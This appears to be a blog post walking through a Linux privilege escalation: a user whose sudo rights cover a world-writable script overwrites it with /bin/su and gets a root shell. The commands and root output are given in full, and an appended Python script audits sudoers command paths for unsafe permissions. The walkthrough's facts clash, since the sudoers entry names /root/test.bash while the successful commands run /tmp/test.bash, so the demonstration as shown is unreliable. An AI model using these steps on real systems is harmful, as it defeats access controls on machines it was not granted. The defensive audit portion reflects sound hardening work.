A dirty privilege escalation trick


A while ago a colleague of mine showed me a quick and dirty privilege escalation trick by which a user can grant themselves root access to a machine.

I felt somewhat inclined to share the trick!

Here is the scenario:

I have a user named sahil on a Linux machine who has been granted sudo access to a script, /tmp/test.bash. The script is just a text file.

Here's the /etc/sudoers entry for the user.

[root@still ~]# grep sahil /etc/sudoers
sahil   ALL=(root)      NOPASSWD: /root/test.bash
[root@still ~]#

If I log in as the user and check its rights via sudo -l, I get the expected result.

[sahil@still ~]$ sudo -l
Matching Defaults entries for sahil on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User sahil may run the following commands on this host:
    (root) NOPASSWD: /root/test.bash


So, without any additional access, when I try to switch to root I can't, as shown below:

[sahil@still ~]$ sudo su
[sudo] password for sahil:
Sorry, user sahil is not allowed to execute '/bin/su' as root on still.
[sahil@still ~]$

But I can run the script.

[sahil@still ~]$ sudo /tmp/test.bash
This is a test script
[sahil@still ~]$


The script is in /tmp, which is accessible to every user, and it has permissions of 777 set, which is never a good thing. Here's an example of why.

Now, as the user sahil, I'll copy the su binary over the script in /tmp, keeping the script's name.

[sahil@still ~]$ which su
/bin/su
[sahil@still ~]$ cp /bin/su /tmp/test.bash

Now when I run the script:

[sahil@still ~]$ sudo /tmp/test.bash
[root@still sahil]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@still sahil]#

The user sahil was able to successfully switch to the root user!
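The defensive counterpart to this trick is a check that every command named in sudoers is root-owned, not writable by anyone else, and not sitting in a directory others can write to. The script below is an added example, not code from the original post: it parses user specification lines of the simplified form shown in the post's grep output (the parser does not handle aliases, quoted arguments or the full sudoers grammar), audits each command path, and reproduces the post's setup with a constructed mode-777 script under a temporary directory.

```python
import os
import stat
import tempfile

SUDO_TAGS = {"NOPASSWD:", "PASSWD:", "SETENV:", "NOSETENV:", "NOEXEC:", "EXEC:"}  # common tags only
SKIP_LINES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")
WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH

def parse_sudoers_commands(text):
    """Collect command paths from 'user host=(runas) [TAG:] /cmd [args], ...' lines."""
    paths = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments; blank lines then have no '='
        if "=" not in line or line.startswith(SKIP_LINES):
            continue
        for cmd in line.split("=", 1)[1].split(","):
            words = cmd.split()
            while words and (words[0].startswith("(") or words[0] in SUDO_TAGS):
                words.pop(0)  # drop the (runas) spec and tags such as NOPASSWD:
            if words and words[0].startswith("/"):  # skips ALL and alias names
                paths.append(words[0])
    return paths

def audit_path(path):
    """List the ways a non-root user could replace the file sudo will run as root."""
    try:
        st = os.stat(path)
    except OSError as exc:
        return [f"{path}: cannot stat ({exc.strerror})"]
    findings = []
    if st.st_uid != 0:
        findings.append(f"{path}: not owned by root (uid {st.st_uid})")
    if st.st_mode & WRITABLE_BY_OTHERS:
        findings.append(f"{path}: writable by group/other (mode {stat.S_IMODE(st.st_mode):04o})")
    # A directory others can write to also lets them swap the file. /tmp's sticky bit limits
    # that to the file's owner, but root-run commands belong in root-owned, 755 directories.
    d = os.path.dirname(os.path.realpath(path))
    while d:
        dst = os.stat(d)
        if dst.st_uid != 0 or dst.st_mode & WRITABLE_BY_OTHERS:
            findings.append(f"{d}: directory not root-owned or writable by others")
        d = os.path.dirname(d) if d != "/" else ""
    return findings

def demo_world_writable_script():
    """Constructed reproduction of the post's setup: a mode-777 script under /tmp named in sudoers."""
    script = os.path.join(tempfile.mkdtemp(), "test.bash")
    with open(script, "w") as f: f.write("#!/bin/bash\necho 'This is a test script'\n")
    os.chmod(script, 0o777)
    return {p: audit_path(p) for p in parse_sudoers_commands(f"sahil ALL=(root) NOPASSWD: {script}\n")}
```

Calling demo_world_writable_script() returns a dict mapping the constructed script to its findings, which include the 777 mode and the writable /tmp ancestor; run it against the real file with audit_path(p) for each p in parse_sudoers_commands(open("/etc/sudoers").read()) as root.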
